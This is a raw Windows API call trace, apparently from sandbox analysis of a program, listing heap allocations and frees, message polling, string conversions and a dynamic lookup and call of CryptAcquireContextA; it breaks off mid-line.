[0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.475] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.475] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.475] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.476] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.476] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.480] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.481] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.481] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.483] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.484] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.484] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0198.484] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.484] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0198.484] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.484] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.485] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.485] RtlAllocateHeap 